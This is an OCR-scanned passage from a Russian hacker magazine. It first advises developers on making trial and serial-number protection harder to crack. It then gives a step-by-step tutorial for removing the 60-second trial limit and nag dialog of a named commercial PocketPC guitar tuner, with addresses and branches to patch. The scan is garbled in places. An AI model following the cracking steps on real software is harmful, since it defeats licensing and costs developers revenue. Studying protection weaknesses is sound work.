ограничения trialHoro срока в саму про- 
грамму еще на стадии компиляции. По- 
скольку программы не выкладываются на 
сервер каждый день, чем позднее поль- 
зователь скачает программу, тем короче 


длительность демонстрационного перио- 
да. Так что лучше удлинить испытатель- 
ный срок до 60-ти дней и обновлять про- 
грамму на сервере не реже раза в месяц. 

Как бороться с повторными скачи- 
ваниями? Во-первых, если программа 
тяжелая, громоздкая и большая, далеко 
не каждому пользователю будет в ра- 
дость каждый месяц перекачивать мега- 
байты данных по своему каналу. Во-вто- 
рых, можно отдавать программу только 
после предварительной регистрации, и 
тогда бедному пользователю придется 
каждый раз выдумывать себе разные 
адреса, менять ящики и т.д. Все это 
сильно напрягает и склоняет пользова- 
теля к регистрации. 

Как вариант, можно сделать так, что- 
бы при первом запуске инсталлятор (не со- 
держащий в себе основного тела програм- 
мы) собирал информацию о конфигурации 
и отправлял ее серверу. Сервер сверял бы 
ее со своей базой и в зависимости от это- 
го либо отдавал бы программу, либо не от- 
давал. Совершенно не обязательно писать 
«сетевой инсталлятор» — лучше просто 
дать ссылку на временный линк, автомати- 
чески удаляющийся через несколько дней, 
что реализуется очень просто и решает 
проблемы «докачки». Взломать такую за- 
щиту пользователю (даже очень и очень 
продвинутому) будет уже не под силу, да и 
крэкеров она напряжет изрядно. 
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Типичная реакция программы на оконча- 
ние испытательного срока 
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десять «не» 


МЕЛКИЕ ПРОМАХИ, ВЕДУЩИЕ 
К СЕРЬЕЗНЫМ ПОСЛЕДСТВИЯМ. 
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Категорически недопустимо 60- 
роться с пассивными отладчи- 
ками. Многие системщики по- 
стоянно держат Softlce в фоне 

и совсем не для хакерских це- 
лей. Уже давно они не ломают 
защиты: нет времени, да и про- 
граммирование приносит гораз- 
до большие деньги. Однако ког- 
да необходимая программа ру- 
гается Ha Sofelce, отказываясь 
запускаться, они выседают на 
ярость и, тряхнув стариной, раз- 
носят защиту в пух и прах, при- 
том очень часто выкладывают 
крэк на всеобщее обозрение. 


Не нужно пытаться обнаружить 
виртуальные машины — все 
равно не получится. Их слиш- 
ком много: VM Ware, VirtualPC, 
BOCHS, QEMU... К Tomy же 
многие пользователи и сете- 
вые/журнальные обозреватели, 
не желая замусоривать свою 
основную систему, «обкатыва- 
ют» новые программы именно 
под виртуальными машинами. 
И если те отказываются запуска- 
ться там, выбор отдается в поль- 
зу конкурентной программы. 


BOCHS — одна из многих 
виртуальных машин 


Привязываться ни к чему нель- 
зя. Пользователям очень не нра- 
вится, когда программы привя- 
зываются к оборудованию (а как 
же апгрейд?). К тому же подоб- 
ная привязка очень легко «отла- 
мывается». Если и не отламыва- 
ется, то запускается под вирту- 
альной машиной. К носителям 
информации и электронным 
ключам привязываться тоже 
нельзя — честным пользовате- 
лям один геморрой (и реверанс 
в сторону конкурентов), а не- 
честные все равно скопируют. 


Не позволяй взломщику об- 
наруживать явные признаки то- 


64| ЛАБОРАТОРИЯ ВЗЛОМА 


хронометраж обратного 
отсчета времени 
Никогда не полагайся на системное вре- 
мя — перевести его назад очень легко. К 
тому же существует множество утилит ти- 
na TrialFreezer, которые перехватывают 
вызов АР!-функции семейства GetLocalTi- 
те и подсовывают отдельно взятой про- 
грамме подложную информацию, что 
намного удобнее, чем работать с переве- 
денным временем и смотреть при этом на 
страдания всех приложений. 

Что может сделать защита? Сбе- 
гать в интернет за атомным временем? А 


сравнение различных 
версий одной и той же 
программы 

Разработчик защиты должен считаться с 
тем, что у взломщика наверняка окажет- 
ся несколько различных версий одной и 
той же программы. Что это значит в прак- 
тическом плане? Сравнивая их между со- 
бой, крэкер быстро найдет, где хранится 
жестко прошитая дата истечения испыта- 
тельного срока, серийный номер и эта- 
лонный ключ (если каждая версия отпи- 
рается «своим» ключом). 

Возьмем, к примеру, популярный 
текстовой редактор TSE Pro. Часть защи- 
ты реализована на его собственном ин- 
терпретируемом языке, который скомпи- 
лирован в байт-код и не поддается дизас- 
семблированию. Готовых же декомпиля- 
торов, увы, нет. Тем не менее, защита 
снимается за считанные секунды про- 
стым сравнением двух версий, устано- 


когда криптография 
бесполезна 

В последнее время распространилась мо- 
да на несимметричную криптографию, ци- 
фровые подписи и прочие сертификаты. 
Именно таким образом защищен The Bat. 
Создать генератор ключей, располагая 
только той информацией, которая заклю- 
чена в защищенной программе, действи- 
тельно невозможно. Потребуется секрет- 
ный ключ, а он есть только у разработчи- 
ка защиты. Что делать? Атаковать ло- 
кальную сеть компании-разработчика? 
Так ведь посадят! 

Хакеры поступают проще. «Отламы- 
вают» защитный код или модифицируют 
открытый ключ, хранящийся в теле про- 
граммы, заменяют его своим собственным 
открытым ключом, для которого существу- 


если пользователь поставит брандмау- 
эр? Наверняка поставит. Вести счетчик 
запусков — прекрасная идея, только он 
очень легко обнаруживается сравнением 
двух «соседних» дампов. 

Надежнее всего сканировать диск на 
предмет поиска самых разных файлов и 
смотреть на дату их создания, причем не 
только брать дату создания/последней мо- 
дификации самого файла, но также извле- 
кать «штамп времени» из заголовков РЕ- 
файлов и динамических библиотек, кото- 
рые можно обнаружить в своем адресном 
пространстве без всякого обращения к 


вленных в различное время на различ- 
ных машинах (в данном случае достаточ- 
но установить редактор в разные катало- 
ги, поскольку никаких проверок на скры- 
тые знаки в нем нет). 


утилита fc.exe из штатной поставки Win- 
dows показывает, что время окончания 
испытательного срока «прошито» в фай- 
лах е32.тас и g32.exe 

Sfc /b e32.mac e32.mac.old 
Сравнение файлов e32.ma_ и 
E32.MAC.OLD 


00000065: 06 05 
00000066: D5 DD 
00000067: C8 D4 


Обложили со всех сторон — сохранять вре- 
мя первого запуска на компьютере пользо- 
вателя нельзя (найдет и удалит), жестко 
прошивать его в теле программы тоже 
(сравнит две версии и «переведет» дату 


ет известный секретный ключ. Крэки для 
Вага работают как раз так. Даже самая 
навороченная криптографическая систе- 
ма в отсутствии механизмов контроля це- 
лостности программы бесполезна, а кон- 
троль целостности легко найти и отломать. 

Исключение составляет тот случай, 
когда криптография используется для 
расшифровки критических фрагментов 
программы, без которых она неработо- 
способна. Не способная к труду програм- 
ма никому не нужна, поэтому для trial-3a- 
щиты такая методика не подходит. И если 
у взломщика имеется хотя бы один-един- 
ственный рабочий экземпляр программы 
с валидным ключом, нейтрализация за- 
щиты — дело техники. 

Несимметричную криптографию мож- 
но и нужно использовать только с тщатель- 


файловой системе. Пользователь же ска- 
чивает новые версии различных разделя- 
емых библиотек, а многие антивирусы и 
другие «сторожевые» программы устана- 
вливают модули, проецируемые на все 
процессы сразу. Конечно, данная методи- 
ка определения времени не очень точна и 
годится лишь для грубой оценки верхней 
границы времени использования. Однако, 
учитывая наличие службы Windows Upda- 
{е и довольно частый выход новых фиксов, 
точность определения вплотную прибли- 
жается к одному-двум месяцам, что для tri- 
а|-защит вполне достаточно. 
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Редактор TSE Pro отказывается запуска- 
ться, мотивируя это тем, что 60-дневный 
испытательный период уже истек 


вперед в HIEW’e). Что же делать? Скрем- 
блировать данные и код! Попросту говоря, 
шифровать разные версии программы раз- 
личными ключами, и тогда прямое сравне- 
ние ничего не даст, если только, конечно, 
взломщик не «распакует» программу, уда- 
лив распаковщик в небытие. Однако борь- 
ба с распаковщиками и пути противостоя- 
ния ей — тема отдельной статьи. 


Почтовый клиент The Bat, 
защищенный несимметричной 
криптографией 


но проработанным механизмом проверки 
собственной целостности, со множеством 
проверок в разных местах. 


константы, говорящие 

сами за себя 

Какой криптографический алгоритм лучше 
использовать: «стандартный» или «само- 
пальный»? Большинство разработчиков 
склоняются в пользу первого и этим застав- 
ляют крэкеров бурно ликовать. 

Обычно защитный механизм кон- 
тролирует свою целостность с помощью 
надежного и хорошо апробированного 
CRC32. Как найти процедуру проверки 
среди десятков мегабайт постороннего 
кода? Очень просто — по стандартному 
полиному. Там, где есть CRC32, всегда 
присутствует и константа EDB88320h. За 
считанные секунды контекстный поиск 
обнаруживает стандартный полином, а 
дальше по перекрестным ссылкам не- 
трудно найти саму процедуру проверки и 
код, вызывающий ее. 

Существует множество готовых про- 
граммного обеспечения, распознающих 
стандартные криптографические алгорит- 
мы. Вот пример только одной из них: 
www.-hexblog.com/2006/01/findcrypt.html — плагин 
для IDA Pro, который распространяется в 
исходных текстах и, к счастью, на бесплат- 
ной основе. 


избыточная сложность, 
обнаруживаемая визуально 
Процедура проверки серийного номе- 
ра/ключа ни в коем случае не должна 
быть запутанной или чрезмерно слож- 
ной, иначе она будет существенно от- 
личаться от всех остальных (обычных) 
процедур и опытный крэкер распозна- 
ет ее банальным «визуальным» прос- 
мотром дизассемблерного листинга 
программы. 

Просто ищем код, внешне отличаю- 
щийся от всего остального. Лучше всего, 
если этот код долго и нудно вычислял 
что-то. В нормальной программе практи- 
чески не встречается линейных фрагмен- 
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Плагин к IDA Pro, 
распознающий стандартные 
криптографические алгоритмы 


Если используются стандартные алгорит- 
мы, необходимо тщательно скрыть все лег- 
ко узнаваемые полиномы и предвычислен- 
ные таблицы, по которым они могут быть 
легко локализованы в теле программы. 


тов такого кода, но при создании защит 
все «перестраховываются» и пишут 
«очень сложные» свертки. Вот по такой 
«навороченности» ты легко находишь 
их... глазами. Разумеется, может не сра- 
ботать для очень экзотического компиля- 
тора, и тогда придется поискать, где про- 
сят ввести код/регистрацию или пред- 
упреждают о взломанном. 

Комментарии, как говорится, из- 
лишни. Господа программисты! Если хо- 
тите защититься, не пишите слишком «на- 
вороченных» процедур. Хакер все равно 
расколет их. Ну и пусть функция растянет- 
ся хоть на тысячу строк — будет легче ло- 
кализовать ее. 


7 


го, что программа еще не взло- 
мана. Выводи ругательство о 
взломе не сразу, а спустя неко- 
торое время, через несколько 
дней). Или хотя бы используй 
«отложенный» вызов «руга- 
тельных» процедур, посылая 
скрытому окну W сообщение 
типа «Нас взломали». Пусть 
окно W поставит его в очередь, 
обрабатываемую вместе с дру- 
ГИМИ «нормальными» сообще- 
ниями, и тогда прямая трасси- 
ровка не приведет ни к чему, а 
крэкер утонет в коде. 


презумпция 
невиновности 
Обнаружив взлом, не пытайся 
«мстить» пользователю неста- 
бильной работой. Далеко не 
каждый потенциальный клиент 
догадается, что причина сбоев 
кроется в плохом крэке, а не в 
самой программе. Столкнув- 
шись с проблемами, он не по- 
бежит регистрироваться, а про- 
сто установит альтернативную 
программу. 


недокументирован- 
ные возможности 

Не используй недокументиро- 
ванные возможности. Это не 
затрудняет взлом (крэкеры 
знают все и обо всем), зато ра- 
ботоспособность защищенной 
программы от этого сильно 
страдает и Windows может про- 
сто отказать при установке 
очередного пакета обновлений 
или при запуске под специфич- 
ной версией. Также не защи- 
щай программу с помощью 
драйверов. Во-первых, без 
многолетнего опыта очень 
сложно написать стабильно ра- 
ботающий драйвер — такой, 
чтобы не завешивал систему и 
не создавал новые дыры в си- 
стеме безопасности. К тому же 
драйверы, в силу их крошечно- 
го размера, очень просто отло- 
мать. Код, написанный Ha Visu- 
al Basic’e, ломается не в при- 
мер сложнее. 


Голубой экран смерти, 
вызванный ошибкой в 
драйвере защиты 


готовые решения 

Не используй готовых защит- 
ных пакетов (протекторов, упа- 
ковщиков). Все готовые реше- 
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несколько серийных 
номеров в одном 

Как обычно ломают программы? Ищут 
процедуру, сравнивающую введенный се- 
рийный номер с эталонным, затем либо 
правят код, либо пишут генератор серий- 
ных номеров. Если же разные части про- 
граммы в различное время будут прове- 
рять различные части одного и того же 
ключа, то взломщику придется очень 
сильно поднапрячься, прежде чем он до- 
ведет взлом до ума. 

Допустим, программа спрашивает 
серийник на запуске и до осуществления 
ввода не пускает никуда дальше. Хакер 
быстро «отламывает» защитный код (пи- 
шет генератор серийных номеров) и про- 


детерминированная 

логика 

Редкая программа ломается в один при- 
CECT, и взломщику для преодоления за- 
щиты приходится предпринимать серию 
последовательных наступлений, рокиро- 
вок и отступлений, планомерно продви- 
гающих его вглубь, все ближе и ближе к 
сердцу защиты. При этом ставятся точки 
останова, картографируется маршрут 
трассировки, с каждым прогоном взлом- 
щик чувствует себя все увереннее и уве- 
реннее. Начинающие ломатели вообще 
ограничиваются тем, что планомерно ха- 
чат один условный переход за другим и 
тешат в себе надежду найти тот един- 
ственный, нужный им (часто он и есть 
единственный). 

Ситуация значительно усложняется, 
если программист применяет оружие не- 
детерминированной логики, или, проще 
говоря, вызывает различные провероч- 
ные функции в случайное время из про- 
извольных мест, используя функцию 
гапа() или другой генератор подобного 
типа. В этом случае взломщик не сможет 
повторить однажды пройденный марш- 
рут: при следующем запуске программа 
пойдет совсем другим путем. Допустим, в 


присутствие регистрацион- 
ных данных в памяти 
Классический способ взлома, уходящий 
своими корнями в эпоху времен ZX- 
SPECTRUM, — прямой поиск регистраци- 
онных данных в памяти. Хакер вводит се- 
рийный номер от балды (либо подсовыва- 
ет взламываемой программе «левый» 
ключевой файл, что стало достаточно 


грамма как будто бы запускается, но при 
расчете таблицы (попытке записать файл 
на диск) проверяет другую часть серийно- 
го номера с помощью дополнительной 
защитной функции, которую взломщик 
благополучно «проморгал» на первой 
стадии взлома. 

Хакер вновь берет отладчик в руки 
и дорабатывает свой генератор (отламы- 
вает вторую проверочную процедуру). И 
вот программа работает уже в полный 
рост, только при выводе на печать... Ну, в 
общем, ты понял. Если крэкер ломает 
программу «для себя», он будет долго 
материться, в конце концов это дело на- 
столько надоест ему, что он все-таки ку- 
пит ее (или доломает из спортивного ин- 


прошлый раз крэкер дотрас- 
сировал программу до точки 
А и понял, что свернул не на 
том повороте (проскочил 


условный переход) и что сво- 


тереса). Если же программа ломается 
«на сторону» по спецзаказу, то после 
первых двух-трех промахов клиент по- 
шлет крэкера и предпочтет заплатить, а 
не мучиться. 

Один момент. Серийный номер ни в 
коем случае не должен храниться в сек- 
ции данных как глобальная переменная, 
иначе перекрестные ссылки и аппарат- 
ные точки останова выдадут функции 
проверки с головой. Всегда передавай 
серийный номер по цепочке локальных 
переменных тысячам посторонних функ- 
ций программы. Тогда взломщик никак 
не сможет отследить, какие именно функ- 
ции реально проверяют серийный номер, 
а какие только передают его по транзиту. 


рачивать нужно было гораздо $1 


раньше, а теперь защитная 


функция уже позади и даль- b 


ше трассировать некуда. OH 
перезапускает отладчик и... с 


превеликим удивлением об- 


пусто 


а конечное 


наруживает, что его занесло 
совсем в другие места, незна- 
комые ему... 

Конечно же, не стоит ис- 
пользовать для этой цели са- 
му библиотечную функцию 


rand(), иначе перекрестные "pomore 
ссылки выдадут все ветвле- 
ния на блюдечке с голубой ка- 
емочкой. Или же взломщик пропатчит 


функцию rand() Tak, чтобы она всегда вы- 
давала один и тот же результат, заста- 
вляющий программу ходить одним марш- 
рутом. Лучше исследовать исходный код 
rand() и переписать его самостоятельно, 
непосредственно вживив в тело програм- 
мы, — тогда ломать программу будет 
очень и очень сложно. 


часто встречаться на месте серийника), 
затем ищет его в памяти и, если защита 
не прикладывает никаких дополнитель- 
ных усилий, действительного находит 
его. Остается установить точку останова 
на эти данные и терпеливо ждать, пока 
защитный код, обращающийся к ним, не 
угодит в капкан. Процедура, ответствен- 
ная за сравнение данных (введенных 


состояние 


Моделирование недетерминированного автомата на 


Допустим, мы имеем десять разных, никак 
не зависимых защитных функций. Часть 
из них вызывается при каждом запуске 
программы, часть — через раз, а часть — 
с вероятностью раз в несколько недель. 
Если защитные функции не выявляются ни 
по каким косвенным признакам, то взлом- 
щику придется полностью проанализиро- 
вать весь код программы, что нереально. 


пользователем) с «эталоном», будет ло- 
кализована и... безжалостно взломана. 
Хитрые программисты поступают так: по- 
символьно считывают клавиатурный ввод 
и тут же шифруют его. Таким образом, 
в памяти уже не оказывается данных, вве- 
денных пользователем, и контекстный по- 
иск теперь не срабатывает, обламывая 
взломщика по полной программе. 


защита в ассемблерных 
вставках 

Хорошо продуманная защита не нужда- 
ется в ассемблере и уж тем более в ас- 
семблерных вставках, выдающих защит- 
ный код с головой. Если в функции отсут- 
ствуют ассемблерные вставки, оптими- 
зирующие компиляторы выбрасывают 
стандартный пролог, адресуя локальные 
переменные и аргументы непосредствен- 
но через регистр ESP. Однако как только 
в теле функции появится хоть одна ас- 
семблерная вставка, для «сквозной» ад- 
ресации через ESP становится недоста- 


точно интеллекта компилятора и он BOS- 


вращается к стандартному прологу. 

Проведем простой эксперимент. 
Возьмем программу и откомпилируем 
ее компилятором Microsoft Visual С++ с 
максимальным режимом оптимизации 
(ключ /Ox). 


исходный код функции без ассемблерных 
вставок 
main() 
{ 

ие al lo 0 2 

по (l= ата ая 
Е (WE in Jel) 


} 


дизассемблерный листинг функции 
без ассемблерных вставок (стандартный 
пролог выброшен компилятором) 


.text:00000000 _main proc 
near 

.text:00000000 xor есх, есх 
.text:00000002 xor eax, eax 
.text:00000004 

.text:00000004 loc_4: ‚ CODE 
XREF: _main+Cvj 

.text:00000004 add ecx, eax 
.text:00000006 add eax, 2 
.text:00000009 cmp eax, 14h 
.text:0000000C jl short 
ое 

. text: 0000000EF push 

есх 

. text: 0000000F push 
offset $SG398 

.text:00000014 

@eulll Чозаниещен 

.text:00000019 add ею, 8 
.text:0000001C ее 
.text:0000001C _main endp 


Как видно, ничего похожего на пролог тут 
нет. Однако стоит добавить хотя бы про- 
стейшую ассемблерную вставку типа 
__asm {mov a,eax } и перекомпилировать 
программу, как все летит кувырком. 


<= ———_— = 


Кладовая исходников 


дизассемблерный листинг той 

же самой функции с мелкой 
ассемблерной вставкой 
.text:00000000 _main proc near 
. text :00000000 


.text:00000000 var_4 = dword 
ice = 

. text :00000000 

. text :00000000 push ebp 
.text:00000001 mov ebp, esp 
.text:00000003 push ecx 
.text:00000004 хог есх, есх 
.text:00000006 хог eax, eax 
.text:00000008 

.text:00000008 loc_8: CODE 
XREF: _main+10vj 
.text:00000008 ааа ecx, eax 
.text:0000000A add eax, 2 
.text:0000000D cmp eax, 14h 
.text:00000010 мене ое 
.text:00000012 mov 
[ebptvar_4], eax 
.text:00000015 push ecx 
.text:00000016 push offset 
$SG398 

.text:0000001B Сато Е 
. text :00000020 add esp, 8 
.text:00000023 mov esp, ebp 
.text:00000025 pop ebp 
.text:00000026 retn 
.text:00000026 _main endp 


Стандартный пролог легко обнаружива- 
ется контекстным поиском, поэтому ли- 
бо вообще не используй никакого ас- 
семблера в своих программах, либо пи- 
ши на чистом ассемблере с последую- 
щей трансляцией в Obj, либо предваряй 
ассемблерные функции спецификато- 
pom «naked», и в этом случае Microsoft 
Visual C++ не будет вставлять ни проло- 
га, ни эпилога A 


10 


ния уже давно сломаны, а что- 
бы научиться правильно поль- 
зоваться ими, необходимо зат- 
ратить достаточно много вре- 
мени. К тому же к твоим соб- 
ственным ошибкам добавятся 
баги протектора (протекторов 
без багов не существует) и ра- 
зобраться в этом глюкодроме 
будет очень нелегко. 


АР!-функции 

Никогда не доверяй АР!-функ- 
циям — очень легко перехва- 
тить их и подсунуть любой же- 
лательный результат. Тем бо- 
лее не используй прямых вызо- 
вов АР!-функций в программе, 
которая использует преимуще- 
ственно библиотечные функ- 
ции и ВТЕ: защита сразу же де- 
маскируется и позволит лока- 
лизовать «логово дракона» во 
многомегабайтной чаще кода 
программы. 


своевременная 
проверка 

Не проверяй ничего на ранней 
стадии инициализации, иначе 
взломщик доберется до защи- 
ты элементарной пошаговой 
трассировкой. Чем позже вы- 
полняется проверка, тем луч- 
ше. Притом проверке не дол- 
жен предшествовать вызов 
«очевидных» АР!-функций (та- 
ких как CreateFile для открытия 
ключевого файла) — между за- 
грузкой ключевого файла и его 
проверкой должно пройти ка- 
кое-то время (в смысле, они 
должны быть разделены как 
можно большим объемом нели- 
нейного кода). 


все гениальное 
просто 

Не защищай программы — все 
равно взломают. Если и не 
взломают, то не купят из прин- 
ципа! Основной доход приносит 
категория честных пользовате- 
лей, для которых достаточно 
тривиальной «защиты» из пары 
строк. Как показывает практи- 
ка, разработка более сложных 
защитных механизмов оказы- 
вается коммерчески неоправ- 
данной (исключение составля- 
ют специализированные про- 
граммные комплексы типа IDA 
PRO, PC 3000, продажи кото- 
рых измеряются лишь тысяча- 
ми штук). Программы, ориенти- 
рованные на массовый рынок, 
лучше распространять бесплат- 
но, а доход при этом получать 
с рекламы, поддержки или дру- 
гих дополнительных сервисов 
(бери пример с Орега). 
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инлаин 


КАК ОБЫЧНО, ДЛЯ «РАЗБОРА» 
НАМ ПОНАДОБЯТСЯ: 


1МЫМЕ-ПАТЧ ПРИЛОЖЕНИЯ ДЛЯ КПК 


КАЖДАЯ ЗАЩИТА ТРЕБУЕТ ИНДИВИДУАЛЬНОГО ПОДХОДА — ПРЯМОГО ИЗМЕНЕНИЯ 
КОДА ПРОГРАММЫ, ГЕНЕРАЦИИ ПРАВИЛЬНОГО КЛЮЧА ИЛИ INLINE-MATYA. ОБЫЧНО 
РЕВЕРС-ИНЖЕНЕРЫ КПК ИСПОЛЬЗУЮТ ТОЛЬКО ПЕРВЫЕ ДВА, ОДНАКО ПОНЯТЬ И 
НАУЧИТЬСЯ ПРИМЕНЯТЬ ТРЕТИЙ — СОВСЕМ НЕ ЛИШНЕЕ 1ЕТОвих INTs (GETORIXeINTS.RU) 


термоядерный 


—  ОТЛАДЧИК, В РОЛИ КОТОРОГО С УСПЕХОМ ВЫСТУПИТ КАК EVC4 SP4, 


ТАК VIDA 4.9 С WINCE DEBUGGER; 


“~ РЕДАКТОР РЕСУРСОВ, ОН ЖЕ RESOURCEHACKER; 

— НЕХ-РЕДАКТОР (ЗАМЕЧАТЕЛЬНО ПОДОЙДЕТ WINHEX 12.5); 

—  РЕ-РЕДАКТОР (НАПРИМЕР CFF EXPLORER lI); 

— ЭМУЛЯТОР MICROSOFT DEVICE EMULATOR (ДЛЯ БЕЗОПАСНОСТИ САМОЙ ЖЕЛЕЗКИ 
РЕКОМЕНДУЮ ПРОВОДИТЬ ИССЛЕДОВАНИЯ ИМЕННО НА НЕМ). 


КСТАТИ, ДЛЯ ПОЛНОГО СЧАСТЬЯ БЫЛО БЫ НЕПЛОХО ИМЕТЬ ПУХЛЕНЬКИЙ БАГАЖ ЗНА- 
НИЙ О МЕТОДАХ АДРЕСАЦИИ, ПРИМЕНЯЕМЫХ В АРХИТЕКТУРЕ ARM, СПОСОБАХ УКЛАДЫ- 
ВАНИЯ ДАННЫХ В СТЕК, ФОРМИРОВАНИИ ОПКОДОВ ИНСТРУКЦИЙ, АВМ-АССЕМБЛЕРЕ 


И МЫМЕ-ПАТЧАХ. 


> = зачем мучиться каким-то инлайном, когда 
можно получить тот же эффект быстрой и на- 
дежной заменой пары байтиков? В общем неза- 
чем, только мир не стоит на месте и авторы про- 
грамм не сидят сложа руки, а постепенно совер- 
шенствуют средства информационной защиты. 
Пока можно радоваться, поглядывая в дизас- 
семблере на нетронутый листинг, но придет вре- 
мя, и на этом же месте мы увидим кучу мусора. 
Так что призываю готовиться и планомерно 
практиковаться в пропатчивании программ во 
время их исполнения, то есть активно осваивать 
навыки т!пе-патчинга. 

Начнем с теории. Inline-naty представляет 
собой подпрограмму для изменения оригинально- 
го исполняемого кода программы, которая запу- 
скается непосредственно до начала выполнения 
этого кода. Передача управления первоначальной 
программе также осуществляется из Tena inline- 
пачта, который размещается практически в любом 
свободном месте файла основной программы. 
> в качестве объекта исследования возьмем 
замечательную программу — гитарный тюнер. 
Для анализа спектра сигнала она использует 
встроенный в КПК микрофон, затем «услышан- 


ная» нота отображается на отображается на 
непонятной с первого взгляда кривой, которая в 
соответствии с выбранными в меню инструмен- 
тами она принимает особый вид. Более того, 
программа может самостоятельно воспроизво- 
дить звуки различной частоты. В общем, разо- 
бравшись в обращении с ней, ты придешь в вос- 
торг. Название этого древнего шедевра (сайт не 
обновляется с 2004 года) — PhonTuner v2.2.2. 

Программа небольшая, смело качаем (www.pho- 
nature.com:8092/home/products_pdaApp_ppc_PhonTuner.htm) , 
устанавливаем на КПК или на эмулятор, через Acti- 
veSync переписываем исполняемый файл Phontun- 
ег.ехе и загружаем его в IDA. На всякий случай на- 
помню, как это делается: 


1 В ША ВЫБИРАЕМ FILE -* NEW. 


2 В ОКНЕ ЖМЕМ НА ЗАКЛАДКУ 
PDA'S/HANDHELDS/PHONES PHONES. 


3 ВЫБИРАЕМ POCKETPC ARM EXECUTABLE. 


disclaim 


Данная статья написана лишь для того, 

чтобы показать разработчикам программного 
обеспечения, насколько слабой бывает защита 
их продуктов. Автор и редакция не несут 
ответственности за применение информации 

в противозаконных целях. 


4 ПОСЛЕ ВЫБОРА ФАЙЛА ЗАПУСКАЕТСЯ 
WIZARD, НА ЕГО ПЕРВОЙ СТРАНИЦЕ 
СТАВИМ ОБЕ ГАЛОЧКИ (IMPORTED DLL 
OPTIONS И ANALYSIS OPTIONS). 


5 НА ВТОРОЙ СТАНИЦЕ ОТМЕЧАЕМ BCE 
(CREATE IMPORTS SEGMENT, CREATE 
RESOURCE SEGMENT). 


6 НЕСКОЛЬКО РАЗ ЖМЕМ «ДАЛЕЕ», 
ОСТАВЛЯЯ ВСЕ ОСТАЛЬНЫЕ НАСТРОЙ- 
КИ КАК ЕСТЬ. 


После закрытия окна Wizard IDA начнет свой ана- 
лиз. Так как файл небольшой, процесс не займет 
много времени. 

Как обычно, сначала должен быть опреде- 
лен тип защиты программы. Запускаем ее на 
устройстве (или эмуляторе). Сразу наблюдаем ок- 
но с надписью «This trial copy of PhonTuner will exit 
in 60 seconds. To purchase a fully functional copy, 
please visit: www-phonature.com, Thanks for supporting 


our product». Маловато. Однако жмем OK и 60 ce- 
кунд наслаждаемся работой программы. Время 
проходит, и на экране появляется MessageBox с 
надписью, аналогичной той, что была в самом на- 
чале (рисунок 1). Затем программа действитель- 
но завершается. 

Выяснилось, откуда можно плясать. Значит, 
переходим в IDA. Как правило, MessageBox ис- 
пользует строки из секции .data, поэтому начнем 
с просмотра данных в окне Strings window. Удиви- 
тельно, но искомая строка обнаруживается толь- 
ко в секции ресурсов .rsrc, а в секции данных ни- 
чего похожего нет (на самом деле есть, в чем 
убеждаемся перейдя на адрес 02978С. IDA этого 
не заметила, что очень загадочно). Не страшно, 
нужный код обращения к MessageBox можно най- 
ти менее интеллектуальным, но очень надежным 
путем — через LR (Link Register) или продвигаясь 
по вызовам функций в обратном направлении. 
Для этого в окне Names window ищем строку Мез- 
sageBox, щелкаем по ней дважды и переходим на 
код, представленный в листинге 1. 

Эта процедура передает управление в си- 
стемную библиотеку согед!.а!, которая, соб- 
ственно, и отображает сообщение. Нам же нуж- 
но узнать, откуда она вызывается. Можно, ко- 
нечно, нажать клавишу <х> и просмотреть все 
ее вызовы через XREF (перекрестные ссылки), 
но поступим проще. Просто поставим breakpoint 
на адрес 10268 и запустим программу в отлад- 
чике (в IDA 4.9 — кнопка <F9>). Пропускаем ди- 
алог с напоминанием при загрузке и ждем нена- 
вистные 60 секунд. Останавливаемся, где про- 
сили, и смотрим в регистр LR. Там красуется ад- 
рес 168С8. Переходим на него в листинге IDA, 
видим формирование текста сообщения и пол- 
ное отсутствие каких-либо ветвлений. Что >, ви- 
димо, нужно забраться куда-то выше. Повторим 
только что проделанный трюк и поставим break- 
point на начало этой функции (адрес 16880). Пе- 
резапускаем программу в отладчике, снова 
ждем. На этот раз после остановки в LR лежит 
адрес 18078. По нему переходим в IDA и об- 
наруживаем там содержимое листинга 2. Ну вот, 
совсем другое дело. 

Изучив этот код, а особенно переходы по ад- 
ресам 18DC8 и 18DEC, можно догадаться, что про- 
грамма продолжает работу: если одна секунда 
еще не прошла (видимо, об этом говорит байт, 
равный нулю и взятый по адресу [R4,R7]) или если 
таймер насчитал меньше 60 секунд (#0x3C). Таким 
образом, проблему решит замена условного пере- 
хода «BLS loc_18E04» на безусловный «BLS 
loc_18E04» по адресу 18DEC. 

К сожалению, это еще не все. При загруз- 
ке программы появляется диалог с напоминани- 
ем об ограничениях. Ликвидируем его для боль- 
шего удобства. Подойдем к вопросу творчески, 
запустим Resource Hacker. Загрузив в него наш 
файл, изучим вкладку Dialog и в подпапке 
«117» найдем знакомое нам окно (оно изобра- 


жено на рисунке 2). Прикинув в уме, получим 
шестнадцатеричное значение: 117 = Ox75h. 
Именно так, скорее всего, будет выглядеть 
идентификатор этого диалога в листинге IDA 
перед загрузкой из ресурсов. 

Возвращаемся в IDA и с начала листинга 
жмем <Alt>+<T>, где в строке поиска вводим 
«FindResource» (эта функция используется для 
поиска ресурса в файле ресурсов). Останавлива- 
емся по адресу 11158. Смотрим выше на ID ре- 
сурса... #0х75! Наверное, повезло. Так или иначе, 
изучим предшествующий этому событию код, 
отраженный в листинге 3. 

Как видно, этот диалог перестанет появлять- 
ся, если заставить сработать условный переход 
по адресу 11144, реагирующий на результат, воз- 
вращаемый функцией sub_190D8 (видимо, это 
функция проверки зарегистрированности). Есть 
такое решение — заменить условный переход 
«BNE loc_11184» безусловным «В loc_11184» по 
адресу 11144. 

Теперь при грамотном пропатчивании суще- 
ствующая защита перестанет мешать нормальной 
работе с подопытной программой. 


ЛИСТИНГИ 


Листинг 1. Код вызова функции MessageBox 
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Рисунок 1. Сообщение перед выходом 


Листинг 2. Код, анализирующий таймер 
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Листинг 3. Проверка регистрации при старте 


Официальный сайт PhonTuner'a 


> = остается написать патч. Kak уже было сказа- 
HO, пИпе-патч должен быть запущен перед перехо- 
дом на OEP (Original Entry Point), но в нашем слу- 
чае EP (Entry Point) = OEP. Откуда же его вызы- 
вать? Можно, конечно, поколдовать с самим фай- 
лом: добавить новую секцию (с патчем), изменить 
параметр AdressOfEntryPoint в РЕ-заголовке, ука- 
зав на эту секцию, и потом из тела патча переда- 
вать управление непосредственно на начало про- 
граммы в основной секции кода. В предложенном 
способе плохо только то, что придется вносить 
значительные модификации в файл (получив, как 
следствие, изменение размеров и смешение сек- 
ций), чего как раз не хотелось бы. У меня же роди- 
Листинг 4. ААМ-код inline-natua лась идея заменить первый в программе В! -пере- 
ход (Branch with Link) на вызов нашего inline-naTya 
и уже из него (после того как основной код будет 
исправлен) передать управление функции, вы- 
